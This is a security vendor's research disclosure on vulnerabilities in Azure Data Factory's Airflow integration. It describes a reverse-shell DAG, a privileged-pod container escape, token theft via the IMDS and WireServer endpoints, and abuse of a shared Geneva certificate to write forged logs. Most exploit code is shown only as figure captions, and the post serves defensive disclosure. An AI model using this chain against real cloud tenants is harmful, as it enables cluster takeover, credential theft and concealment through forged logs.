Dirty DAG: New Vulnerabilities in Azure Data Factory’s Apache Airflow Integration

15 min read

Executive Summary

Unit 42 researchers have discovered new security vulnerabilities in the Azure Data Factory Apache Airflow integration. Attackers can exploit these flaws by gaining unauthorized write permissions to a directed acyclic graph (DAG) file or using a compromised service principal.

While classified as low severity vulnerabilities by Microsoft, the risk still carries significant potential impact for organizations that use Azure Data Factory. The vulnerabilities can provide attackers with shadow admin control over Azure infrastructure, which could lead to data exfiltration, malware deployment and unauthorized data access.

Our research identified multiple vulnerabilities in the Azure Data Factory:

Misconfigured Kubernetes RBAC in Airflow cluster
Misconfigured secret handling of the Azure’s internal Geneva service
Weak authentication for Geneva

Exploiting these flaws could allow attackers to gain persistent access as shadow administrators over the entire Airflow Azure Kubernetes Service (AKS) cluster. This could enable malicious activities like data exfiltration, malware deployment or covert operations within the cluster.

Once inside, attackers can also manipulate Azure’s internal Geneva service, which is responsible for managing critical logs and metrics. This could allow attackers to potentially tamper with log data or access other sensitive Azure resources.

Although the cluster we used was isolated from other clusters, the fact that the managed Airflow instance used default, non-changeable configurations and the cluster admin role is attached to the Airflow runner caused a security issue. Attackers could manipulate this issue to control the Airflow cluster and related infrastructure.

Unit 42 researchers have shared these vulnerabilities with Azure. This issue highlights the importance of carefully managing service permissions to prevent unauthorized access. It also highlights the importance of monitoring the operations of critical third-party services to prevent such access.

In this article, we provide an overview of our findings and outline key mitigation strategies to help safeguard cloud environments from similar threats.

We will also examine Azure's internal Geneva service, which was used in an Airflow instance with write permissions to specific shared storage accounts. Figure 1 illustrates the Azure Data Factory Airflow infrastructure and the attack process.

Flowchart demonstrating a cybersecurity attack involving four steps: Step 1 shows pushing a malicious Dag; Step 2 depicts privilege escalation in a Kubernetes system; Step 3 involves data access in a PostgreSQL Server; and Step 4 outlines footprint masquerading in an Azure Tenant scenario. — Figure 1. Azure Data Factory and airflow cluster architecture overview.

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products:

Cortex XDR and XSIAM
Advanced WildFire
Next-Generation Firewall with the Advanced Threat Prevention security subscription

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics	Microsoft Azure, Containers

Background: Azure Data Factory and Apache Airflow

Before we delve into the intricacies of our research on Azure Data Factory and Apache Airflow, it's essential to be aware of the following fundamental concepts.

Data Factory service
- Data Factory is an Azure-based data integration service that enables users to manage data pipelines when moving data between different sources.
Airflow service
- Apache Airflow is an open-source platform that facilitates the scheduling and orchestration of complex workflows. This enables users to manage and schedule tasks as Python-coded DAGs.
Airflow DAG files
- DAG files define the workflow structure as Python code. These files specify the sequence in which tasks should be executed, dependencies between tasks and scheduling rules.
Azure Airflow integration with Data Factory
- Azure Data Factory offers a managed Airflow instance integration that is deployed as an AKS cluster managed by Azure.

Gaining Initial Access to the Azure Data Factory Airflow Integration

Here's a high-level overview of the flow of an initial attack scenario:

Craft a DAG file that opens a reverse shell to a remote server and runs automatically when imported.
Upload the DAG file to a private GitHub repository connected to the Airflow cluster.

Airflow imports and runs the DAG file automatically from the connected Git repository, opening a reverse shell on an Airflow worker. At this point, we gained cluster admin privileges due to a Kubernetes service account that was attached to an Airflow worker.

There are two ways for attackers to gain access to and tamper with DAG files:

Gaining write permissions to the storage account containing DAG files by leveraging either a principal account with write permissions or a shared access signature (SAS) token for the files. SAS tokens temporarily grant limited access to DAG files. Once a DAG file is tampered with, it lies dormant until the DAG files are imported by the victim.
Gaining access to a Git repository by leaked credentials or a misconfigured repository. Once this is obtained, the attacker creates a malicious DAG file or modifies an existing one and the directory containing the malicious DAG file is imported automatically.

We chose to use leaked credentials from a Git repository as an attack scenario. In this case, once the attacker manipulates the compromised DAG file, Airflow executes it and the attacker gets a reverse shell.

For our research, we crafted a malicious DAG file (shown in Figure 2).

Screenshot of code including import statements and a DAG definition with a bash operator. — Figure 2. Reverse shell DAG code.

The file ran automatically upon import (as shown in Figure 3) using the schedule_interval and start_date parameters. The file’s purpose was to run a task that initiates a reverse shell to an external server.

Screenshot of the Apache Airflow web interface displaying a list of DAGs (Directed Acyclic Graphs) with various statuses indicated by colored circles: green for success and red for failure. The screen shows options for triggering DAGs, refreshing the view, and filtering tasks. — Figure 3. Airflow user interface (UI) showing current DAG files with details.

Upon running the DAG file, we received the reverse shell connection and could communicate with the instance. The shell we received was running under the context of the Airflow user in a Kubernetes pod shown in Figure 4, which had minimal permissions.

A computer screen displaying a command prompt where the command "whoami" has been typed and the response underneath is "airflow". The text is in white with a black background. — Figure 4. Whoami shows a non-root user.

However, the pod had public internet access as shown below in Figure 5.

Screenshot curl displaying various metrics such as DNS server IP address, download and upload speeds, total data spent, and current speed. — Figure 5. Curl shows that we have public internet access.

While inspecting the pod, we discovered a secret, which was a service account token mounted into the pod file system. Due to the pod's network connectivity, this new access allowed us to download Kubectl (Kubernetes’ command-line tool) and to test our permissions as shown in Figure 6.

Terminal screen showing a command `kubectl auth can-i --list` with the output displaying permissions for Resources and Non-Resource URLs in Kubernetes. — Figure 6. Worker pod shows Kubernetes cluster admin privileges.

We saw that the service account used by the pod had cluster admin permissions, giving us full control over the entire cluster. These permissions included creating pods, accessing Kubernetes secrets (shown in Figure 8) and creating new users. This allowed us to enumerate the cluster environments (shown in Figures 7 and 8) and to gain more insight on how Airflow was deployed.

Screenshot of a computer terminal displaying the output of the Kubernetes command "kubectl get pods -A", listing several pods and their names. — Figure 7. Pods inside the cluster.

Text-based screenshot depicting the output of a command-line operation to list Kubernetes secrets, showing columns for namespace, name, type, data, and age, with various entries under each heading. — Figure 8. Kubernetes cluster secrets relevant to Azure and Airflow.

We found secrets related to Airflow, such as the PostgreSQL backend password and TLS certificates to the Airflow domain. Additionally, we observed an API key to an exposed storage account containing DAG files, shown in Figure 9.

A terminal screen showing the output of the command `kubectl get secret`, displaying an output snippet including API version and data keys for Azure storage account and a web server secret. — Figure 9. Showing secrets that are stored in the cluster.

Microsoft’s response to the underlying security issue that we reported was to underscore that “the above is isolated to the researcher's cluster alone.”

Although the cluster is isolated from other clusters, the fact that the managed airflow instance used default, non-changeable configurations and the cluster admin role is attached to the Airflow runner caused a security issue. Attackers could manipulate this issue to control the Airflow cluster and related infrastructure.

When enumerating the cluster resources, we understood that a single tenant deployment and the cluster are available only to us. However, to exhaust our options, we further enumerated the cluster and primarily found Airflow pods such as the server backend and web UI, as well as some pods labeled geneva-services. We will delve into the meaning of this label further in a later section (Exploiting Geneva – Azure Internal Service) to explore the potential impact.

Container Escape: AKS Gaining Access to Host

Once we had cluster admin permissions, we could perform escalation and cluster takeover by deploying a privileged pod and breaking out onto the underlying node as shown in Figure 10. The privileged pod had shared host resources and the host’s root file system as a mounted volume.

Command line interface displaying Kubernetes commands for a privileged pod test and entering a new root directory. — Figure 10. Accessing the host disk with a privileged pod.

At this point, we gained access to the host virtual machine (VM) with root access.

From the uname command output (shown in Figure 11), we understood that we were running in the scope of a VM scale set (Azure VM scaling solution), and that the Airflow cluster was running on top of that.

A command line interface displaying a Linux kernel version, the text indicates it's running on Microsoft Azure, with specific version and build details. — Figure 11. Uname command revealed information about a host.

Figure 12 depicts the container breakout flow.

Flowchart depicting a cybersecurity attack using containers and pods. From left to right: "Malicious DAG" symbol leads to "Run DAG," which connects to "Create Pod." This flows into a symbol labeled "Privileged Pod," then to "Chroot Host," and culminates with "Host Takeover." The symbols are connected by arrows indicating sequence. — Figure 12. Chain of events leading to host takeover.

Full Cluster Control Impact

Having a high-privileged service account connected to the Airflow runner pod enables control to the node itself and presents attackers with multiple opportunities to extend their actions. Here are two examples of such opportunities:

Shadow workloads through shadow administrator access: An attacker could create another service account role with cluster admin privileges. The account could have full access to create pods and other resources inside the cluster that could cause damage, such as creating pods that serve malware or cryptomining without the victims’ awareness. Figure 13 illustrates such a scenario.

Diagram of an Airflow AKS Cluster showing various nodes. The nodes are labeled as Cluster Admin, Airflow-1, Airflow-2, Airflow-3, Attacker Cluster Admin, Malicious Workload, and Crypto Miner. Each node type is represented in either blue or red, with distinct icons for administrative and operational roles. — Figure 13. An attacker can covertly take over the cluster and steal data sources from Airflow.

Data exfiltration: The attacker could gain persistence in the cluster through workload creation, actively leaking data that is connected to the Airflow environment over time as shown in Figure 14. Due to the level of access, the attacker could obtain credential information related to current and future data sources connected to the Airflow environment, such as storage accounts and SQL servers.
Figure 14. An attacker can hijack the cluster for malicious uses.

Discovering Assets in the New Azure Environment

From Root to Azure Identity

After getting root access on the host, we were able to start with the discovery process of our new environment. First, we used the Instance Metadata Service (IMDS) endpoint to grab the machine authentication token.

The IMDS endpoint provides information about currently running virtual machine (VM) instances. This can be used to manage and configure VMs, including getting an authentication token for managed identities assigned to the VM. IMDS is accessed via an exposed endpoint only from the machine itself.

WireServer

Azure’s WireServer is another endpoint that can be accessed from within any Azure VM that in some scenarios exposes sensitive metadata and configuration information. WireServer facilitates communication between Azure VMs and the Azure environment. It does so by enabling the delivery of configuration information and management tasks from Azure to the VMs, ensuring that they operate in accordance with the user's specifications and Azure's infrastructure requirements.

The WireServer is accessed via an HTTP endpoint, which uses the IP address 168.63.129[.]16. This endpoint can be queried to retrieve information about VM extensions and sensitive data. By using the IMDS and WireServer endpoints, we discovered that two managed identities were connected to the Virtual Machine Scale Set (VMSS), a group of load-balanced VMs.

We used the WireServer to obtain further information regarding the instance.

The following activities formed our high-level workflow:

Querying the WireServer endpoint to discover managed identities
Querying IMDS to get an access token for each identity
Enumerating the Azure environment
Querying the Microsoft.Authorization/roleAssignments API call to discover custom roles

First, we queried the WireServer endpoint to see VM extension information and general information with the command shown in Figure 15.

Terminal screenshot displaying a curl command with user-agent and version specified in the command. — Figure 15. WireServer API call.

From this query, we got the following output shown in Figure 16. The output shows the virtual machine state, different configurations and information that can be gathered about the machine.

Screenshot of a computer screen displaying code. The text includes elements like machine details, host information, and IP addresses. Some of the information has been redacted. — Figure 16. WireServer API output.

After that, we did the same for the extension endpoint shown in Figure 17, with the following command:

hXXp://168.63.129[.]16:80/machine/<REDACTED>-6f7490f0cc7b/<REDACTED>-ab78-81795f77ad10._aks-agentpool-30850510-vmss_2?comp=config;type=extensionsConfig;incarnation=2

We received the response shown in Figure 17.

Screenshot of code with highlighted sections indicating the "ClientId" and "TenantID" values. Two lines are highlighted in green and two in red. — Figure 17. WireServer VM identity information.

We can see two user-assigned managed identities that are created for the cluster:

httpapplicationrouting-<CLIENT TENANTID>
<CLIENT TENANTID>-agentpool

For each identity, there is an attached attribute IdentityClientId that is used when querying the IMDS endpoint to obtain its relevant access token. Figure 18 depicts how to query the IMDS endpoint for a specific user-assigned managed identity token.

Screenshot of a command line interface using a curl request to the Azure API, including parameters for identity, client ID, resource URL, and metadata settings. — Figure 18. IMDS API call to retrieve specific managed identity credentials.

From our query, we received the token shown in Figure 19.

Code snippet displaying an access token response from Microsoft Azure, including keys for client ID, expiration times, and token type. — Figure 19. Azure access token for relevant identity.

The Discovery Process in the New Azure Environment

At this point, we started analyzing the Azure subscription we were running on by using the new identity tokens. We found some resources we could access, and by enumerating them in the environment, we could better understand our options.

A dedicated resource group for each Airflow deployment is created when the AKS is deployed. A special HTTP application-routing add-on for Kubernetes is added that can create records in the DNS zone resource and enable network routing to the AKS instance. This add-on will soon be retired and it is not suitable for production usage, as described in this article on Azure.AKS.HTTPAppRouting.

The add-on creates the HTTPApplicationRouting identity with a Reader role (shown in Figure 20) over the resource group and a Contributor role over the DNS zone, which enabled us to modify the DNS service attached to the cluster.

Diagram showing a Microsoft Azure internal subscription, including an HTTPApplicationRouting Managed Zone connected to a Unique Client Resource Group and a VM scale set with several virtual machines labeled VM1 through VMN within an AKS cluster environment. The layout includes icons representing network structures and text annotations that explain the roles and components of the Azure services. — Figure 20. Cloud infrastructure topology of Airflow deployment.

At this point, several Azure-managed resources were accessible to us. Initially, this was just the storage account where the DAG files were imported and the DNS zone to which we had contributor access and could modify records.

Additionally, custom role definitions inside Azure’s tenant with the keyword Geneva (shown in Figure 21) caught our eye. This was notable because the cluster had pods labeled geneva-service-xxxx (shown previously in Figure 7).

Screenshot of a configuration file for Azure role-based access control, including definitions for role permissions and descriptions. — Figure 21. Custom roles regarding Geneva, each with different permissions.

The role definitions prompted questions about the nature of these pods, as well as the purpose of Geneva and its application.

When we inspected the role’s permissions, it showed us what type of capabilities Geneva could have. We found that it was able to manage multiple types of Azure resources, such as event hubs, subscription management and storage.

Permissions such as Microsoft.Storage/storageAccounts/listKeys/action or Microsoft.Resources/subscriptions/read and Microsoft.EventHub/register/action (which is used to register an EventHub provider) show Geneva’s potential capabilities.

These high-privileged custom roles led us to inspect the pods in our cluster and their runtime behavior.

Disclosing internal role definition information and enumerating the cluster’s cloud environment could help attackers better understand what they can and can’t do. Furthermore, attackers could use the access tokens to modify the DNS zone resource and access storage accounts related to Airflow.

Exploiting Geneva – Azure Internal Service

Upon encountering Azure resources and pods regarding Geneva in our cluster, we assumed Geneva was related to gathering analytics data. We wanted to explore this to better understand this internal Azure system. Figure 22 shows which pods were in the AKS cluster.

Text displaying three lines of code, each beginning with "geneva-services" followed by a unique suffix: cw98t, dz6jc, pjd9h. — Figure 22. Geneva pods in the Airflow cluster.

Geneva service is an internal Azure service that monitors and gathers analytical data from Microsoft’s infrastructure on a large scale. The impact of any security misconfigurations in this service can be detrimental.

There isn’t much information online about Geneva, other than on a small number of Microsoft forums for in-house developers. As such, we started analyzing the runtime behavior of the pods to gain a better understanding of the service.

The following activities formed our high-level workflow:

Inspecting Geneva pods and the attached secrets in our cluster
Performing a runtime and static analysis of pods, as well as the certificate and key in the secrets
Discovering internal API endpoints used by pods
Leveraging the API endpoints to disclose multiple Azure resources
Exploiting read/write privileges on multi-tenant shared resources

Geneva Service Pod Inspection

Inspecting the pods revealed that they used the secrets azsecpack-auth, mdm-authandmdsm-auth (shown in Figure 23).

We saw processes inside the pod that ran the Azure mdsd monitoring agent (shown in Figure 24).

A screenshot of a terminal with a process list, displayed using the "ps ef" command. The list includes columns for UID, PID, PPID, start time, and more. — Figure 24. Geneva service pods running processes.

At this point, we assumed that the mdsd agent collects metrics such as cluster health, pod status and current live processes. It then sends them to the Geneva service.

Moreover, a binary that we found related to mdsd used a certificate and a key as a type of authentication. Figure 25 shows the different flags the binary used.

A screenshot of a command-line interface displaying a list of allowed arguments for a utility, which includes commands related to help, monitoring environment, namespace, identity type, and configuration among others, with specific examples provided at the bottom. — Figure 25. Non-standard mdsd utility binary in the pod that is used for debugging.

The azsecpack-auth, mdm-auth and mdsm-auth secrets contained a certificate and a private key shown in Figure 26.

A screenshot displaying commands and outputs on a computer terminal, including interactions with Kubernetes showing secret management commands. The visible text features keys and metadata. — Figure 26. Certificate that was stored as a secret in the Airflow cluster.

Using the OpenSSL command-line interface (CLI), we inspected the certificate with the following command:

openssl x509 -in certificate.crt -text -noout

Figure 27 shows the details we received.

Screenshot of a digital certificate displaying various encryption and authentication details including serial number, issuer, validity dates, and other security algorithms. Some information is redacted. — Figure 27. OpenSSL information about certificate identity.

The decoded certificate in Figure 27 above shows that the subject CN (which is the domain name protected by the certificate) was gcs.svc.datafactory.azure.com. When we inspected the same secrets in other Airflow deployments, we saw the same subject CN used across all deployments.

In addition, all Airflow deployments use the same certificate to authenticate to the Geneva service. There is no separation between different Airflow deployments.

Discovering Internal API Endpoints

At this point, we wanted to better understand Geneva’s mechanism through the mdsd binary. We reverse engineered the binaries to reveal multiple API endpoints that mdsd monitoring agents used to communicate with Geneva. Figures 28 and Figure 29 show snippets from the reverse engineering process.

Screenshot of a computer screen displaying various lines of coding and configuration paths related to a monitoring account, which are highlighted in red boxes. — Figure 28. API endpoints in binary strings.

A screenshot of code from a computer program displayed in color-coded text on a black background. One line in the upper section is highlighted in red. — Figure 29. REST API URL construction inside binary.

In the reverse engineering process, we were able to reconstruct API calls to Geneva. And by using the certificate and key that we found earlier, we could authenticate to Geneva and call the API endpoints that we had found.

The API endpoints we found disclosed more Azure resources. Some gave us write access to storage accounts, event hubs and other internal Azure systems.

Figure 30 illustrates the access level we achieved.

Illustration of a data involving an Airflow cluster named Geneva, which interacts with Databricks Hub and Storage Accounts through read and write operations using HTTP Rest and Geneva services. — Figure 30. Geneva service in our cluster with access to different Azure resources.

Geneva's Aftermath: The Impact on Azure’s Ecosystem

Internal Data Assets Exposed

Using the above endpoints and keys, we found multiple SAS tokens for data assets.
Figures 31 and 32 show examples of the tokens we found.

Screenshot of code with highlighted sections showing resource names as "BlobService" and "TableService." Some information has been redacted. — Figure 31. Storage accounts keys found.

Screenshot of a code snippet with some redacted text, mentioning URLs related to 'onedrive.windows.net', and showing key-value pairs for data fields including 'Session' and 'IPAddress'. — Figure 32. Event hub keys found.

We also found we weren’t restricted in writing to the datastores.

Another notable API call we found disclosed entities such as users or machines that had access to Geneva (shown in Figure 33).

A screenshot displaying code related to Microsoft Cloud permissions configuration. The repeated line of text includes references to identity, metrics, and user permissions within the Microsoft ecosystem. Some info is redacted. — Figure 33. Information disclosed by an API regarding identities that use Geneva.

Log Manipulation Attack Scenario

By using the exposed SAS tokens for the event hubs, we could exploit and write arbitrary information to them. This means a sophisticated attacker could modify a vulnerable Airflow environment.

For example, an attacker could create new pods and new service accounts. They could also apply changes to the cluster nodes themselves and then send fake logs to Geneva without raising an alarm.

We used the code shown in Figure 34 to demonstrate this.

A screenshot of code in a text editor. Specific AWS services are visible. The code includes function definitions, event handling, and print statements, all written on a dark themed background. — Figure 34. Proof of concept code that demonstrated the impact of generating and sending crafted logs to Azure’s central log service.

Conclusion

Our research identified multiple vulnerabilities in the Azure Data Factory:

Misconfigured Kubernetes RBAC in Airflow cluster
Misconfigured secret handling of the Geneva service
Weak authentication for Geneva

These vulnerabilities could enable attackers to escape from their pods, gain unauthorized administrative control over clusters and access Azure's internal services (Geneva). Attackers could exploit the vulnerabilities through compromised service principals or unauthorized modifications to DAG files. This could enable attackers to become shadow administrators and to gain full control over managed Airflow deployments on a single tenant base.

We would like to thank Microsoft MSRC for helping to resolve these issues.

Adversaries have moved beyond basic tactics to more sophisticated service-specific attacks. Therefore, it is essential to adopt a comprehensive protection strategy that goes beyond simply safeguarding the cluster's perimeter.

This strategy should include:

Securing permissions and configurations within the environment itself, and using policy and audit engines to help detect and prevent future incidents (both within the cluster and in the cloud)
Safeguarding sensitive data assets that interact with different services in the cloud, to understand which data is being processed with which data service

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

Advanced WildFire cloud-delivered malware analysis service accurately identifies known samples as malicious
Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks with best practices via the following Threat Prevention signature: 54790
Cortex XDR and XSIAM offer protections relevant to the threat described such as through the reverse shell module for Behavioral Threat Protection.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America Toll-Free: 866.486.4842 (866.4.UNIT42)
EMEA: +31.20.299.3130
APAC: +65.6983.8730
Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Dirty DAG: New Vulnerabilities in Azure Data Factory’s Apache Airflow Integration

Executive Summary

Background: Azure Data Factory and Apache Airflow

Gaining Initial Access to the Azure Data Factory Airflow Integration